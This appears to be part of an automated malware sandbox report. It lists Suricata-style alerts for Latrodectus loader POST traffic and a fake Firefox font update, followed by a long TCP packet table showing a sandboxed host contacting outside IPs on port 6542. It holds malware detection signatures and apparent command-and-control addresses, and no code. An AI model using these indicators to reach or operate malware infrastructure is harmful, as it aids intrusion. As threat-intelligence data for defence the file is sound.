                                                                  2024-12-02T18:46:07.192105+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550016172.67.217.190443TCP
                                                                  2024-12-02T18:46:08.520945+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550017172.67.217.190443TCP
                                                                  2024-12-02T18:46:09.276616+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550017172.67.217.190443TCP
                                                                  2024-12-02T18:46:10.558250+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550018172.67.217.190443TCP
                                                                  2024-12-02T18:46:11.316318+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550018172.67.217.190443TCP
                                                                  2024-12-02T18:46:12.734711+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550019172.67.217.190443TCP
                                                                  2024-12-02T18:46:13.425645+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550019172.67.217.190443TCP
                                                                  2024-12-02T18:46:14.887791+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550020172.67.217.190443TCP
                                                                  2024-12-02T18:46:15.589493+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550020172.67.217.190443TCP
                                                                  2024-12-02T18:46:16.974777+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550021172.67.217.190443TCP
                                                                  2024-12-02T18:46:17.727919+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550021172.67.217.190443TCP
                                                                  2024-12-02T18:46:19.099577+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550022172.67.217.190443TCP
                                                                  2024-12-02T18:46:19.944752+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550022172.67.217.190443TCP
                                                                  2024-12-02T18:46:21.328328+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550023172.67.217.190443TCP
                                                                  2024-12-02T18:46:22.035396+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550023172.67.217.190443TCP
                                                                  2024-12-02T18:46:23.410993+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550024172.67.217.190443TCP
                                                                  2024-12-02T18:46:24.186416+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550024172.67.217.190443TCP
                                                                  2024-12-02T18:46:25.947534+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550025172.67.217.190443TCP
                                                                  2024-12-02T18:46:26.713257+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550025172.67.217.190443TCP
                                                                  2024-12-02T18:46:28.130666+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550026172.67.217.190443TCP
                                                                  2024-12-02T18:46:28.812293+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550026172.67.217.190443TCP
                                                                  2024-12-02T18:46:30.327063+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550027172.67.217.190443TCP
                                                                  2024-12-02T18:46:31.036084+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550027172.67.217.190443TCP
                                                                  2024-12-02T18:46:32.134919+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550028172.67.217.190443TCP
                                                                  2024-12-02T18:46:33.626933+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550029104.21.68.89443TCP
                                                                  2024-12-02T18:46:35.226518+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550029104.21.68.89443TCP
                                                                  2024-12-02T18:46:36.554216+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550030104.21.68.89443TCP
                                                                  2024-12-02T18:46:38.187916+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550030104.21.68.89443TCP
                                                                  2024-12-02T18:46:39.600997+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550031104.21.68.89443TCP
                                                                  2024-12-02T18:46:41.249251+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550031104.21.68.89443TCP
                                                                  2024-12-02T18:46:42.597580+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550032104.21.68.89443TCP
                                                                  2024-12-02T18:46:44.202517+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550032104.21.68.89443TCP
                                                                  2024-12-02T18:46:45.533585+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550033104.21.68.89443TCP
                                                                  2024-12-02T18:46:47.148498+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550033104.21.68.89443TCP
                                                                  2024-12-02T18:46:48.435187+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550034104.21.68.89443TCP
                                                                  2024-12-02T18:46:50.020040+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550034104.21.68.89443TCP
                                                                  2024-12-02T18:46:51.390038+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550035104.21.68.89443TCP
                                                                  2024-12-02T18:46:53.129087+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550035104.21.68.89443TCP
                                                                  2024-12-02T18:46:54.473438+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550036104.21.68.89443TCP
                                                                  2024-12-02T18:46:56.061048+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550036104.21.68.89443TCP
                                                                  2024-12-02T18:46:57.693588+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550037104.21.68.89443TCP
                                                                  2024-12-02T18:46:59.093190+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550037104.21.68.89443TCP
                                                                  2024-12-02T18:47:00.613180+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550038104.21.68.89443TCP
                                                                  2024-12-02T18:47:02.283970+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550038104.21.68.89443TCP
                                                                  2024-12-02T18:47:03.676153+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550039104.21.68.89443TCP
                                                                  2024-12-02T18:47:05.405551+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550039104.21.68.89443TCP

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 2, 2024 18:43:00.173721075 CET497046542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:43:00.176590919 CET497056542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:43:00.293896914 CET654249704103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:43:00.294043064 CET497046542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:43:00.296806097 CET654249705103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:43:00.296892881 CET497056542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:43:00.304183960 CET497046542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:43:00.305382967 CET497056542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:43:00.426369905 CET654249704103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:43:00.427521944 CET654249705103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:43:01.807455063 CET654249705103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:43:01.807568073 CET497056542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:43:01.807655096 CET654249705103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:43:01.807661057 CET654249705103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:43:01.807720900 CET497056542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:43:01.847853899 CET654249704103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:43:01.847956896 CET654249704103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:43:01.847964048 CET654249704103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:43:01.848093033 CET497046542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:43:02.090888977 CET497056542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:43:02.107731104 CET497046542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:43:02.211726904 CET654249705103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:43:02.227818012 CET654249704103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:43:02.621541023 CET654249705103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:43:02.621593952 CET497056542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:43:02.639571905 CET497056542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:43:02.640527964 CET654249704103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:43:02.640580893 CET497046542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:43:02.653573036 CET497046542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:43:02.759543896 CET654249705103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:43:02.773622036 CET654249704103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:43:02.875967979 CET497066542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:43:02.996100903 CET654249706103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:43:02.996227980 CET497066542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:43:03.004276037 CET497066542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:43:03.124264956 CET654249706103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:43:13.837815046 CET654249705103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:43:13.837937117 CET497056542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:43:13.854476929 CET654249706103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:43:13.854553938 CET654249706103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:43:13.854559898 CET654249706103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:43:13.854587078 CET497066542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:43:13.854656935 CET497066542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:43:13.871364117 CET497066542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:43:13.992273092 CET654249706103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:43:14.498846054 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:14.620475054 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:14.620646000 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:14.621121883 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:14.748619080 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:15.912923098 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:15.912976027 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:15.913091898 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:15.913105011 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:15.913131952 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:15.913147926 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:15.921541929 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:16.041428089 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:16.321329117 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:16.323635101 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:16.339838982 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:16.459886074 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:21.949295044 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:21.949369907 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:21.949417114 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:21.949428082 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:21.949459076 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:21.949475050 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:21.949733019 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:21.949773073 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:21.949965954 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:21.949981928 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:21.950009108 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:21.950020075 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:21.958296061 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:21.958374023 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:21.958409071 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:21.958455086 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:21.964668989 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:21.964730024 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:21.964831114 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:21.964873075 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:21.973592997 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:21.973654032 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:21.973861933 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:21.973906040 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:21.982605934 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:21.982666016 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:21.982753038 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:21.982795954 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.069494009 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.069608927 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.069663048 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.069708109 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.073884964 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.073950052 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.150517941 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.150568962 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.150590897 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.150628090 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.154239893 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.154288054 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.156219006 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.156261921 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.156531096 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.156570911 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.163280010 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.163330078 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.163564920 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.163602114 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.171442986 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.171494007 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.171530962 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.171576023 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.178734064 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.178785086 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.178872108 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.178910017 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.186304092 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.186348915 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.186517954 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.186573029 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.193945885 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.193995953 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.194093943 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.194145918 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.201699018 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.201744080 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.201886892 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.201930046 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.209481955 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.209608078 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.209616899 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.209666014 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.214993000 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.215040922 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.215121031 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.215163946 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.220644951 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.220705032 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.220803976 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.220896959 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.226349115 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.226396084 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.226438046 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.226490974 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.230001926 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.230071068 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.230226994 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.230279922 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.235507011 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.235610008 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.235658884 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.235765934 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.241329908 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.241466045 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.351680994 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.351736069 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.351838112 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.351888895 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.353792906 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.353847027 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.353873968 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.353919983 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.358066082 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.358146906 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.359534025 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.359664917 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.359719038 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.359734058 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.363795042 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.363863945 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.363935947 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.363986969 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.367970943 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.368048906 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.368058920 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.368104935 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.372019053 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.372070074 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.372127056 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.372209072 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.376266956 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.376367092 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.376436949 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.376504898 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.380589008 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.380656004 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.380892992 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.380955935 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.384334087 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.384381056 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.384545088 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.384594917 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.388394117 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.388446093 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.388540030 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.388603926 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.393105984 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.393151999 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.393254995 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.393306971 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.396646023 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.396706104 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.396743059 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.396802902 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.400811911 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.400866032 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.400943041 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.401020050 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.404866934 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.404943943 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.404978037 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.405024052 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.408859015 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.408910036 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.408993006 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.409152985 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.412981033 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.413047075 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.413125992 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.413203955 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.417294025 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.417332888 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.417361975 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.417391062 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.421248913 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.421314001 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.421375036 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.421420097 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.425324917 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.425379992 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.425477028 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.425523043 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.430362940 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.430370092 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.430434942 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.433732986 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.433799028 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.433918953 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.433964014 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.437783957 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.437855005 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.437942982 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.437984943 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.441962004 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.442018032 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.442133904 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.442182064 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.446177959 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.446234941 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.446326017 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.446496010 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.449927092 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.450018883 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.450040102 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.450097084 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.453984022 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.454056025 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.554292917 CET65424971394.232.43.224192.168.2.5
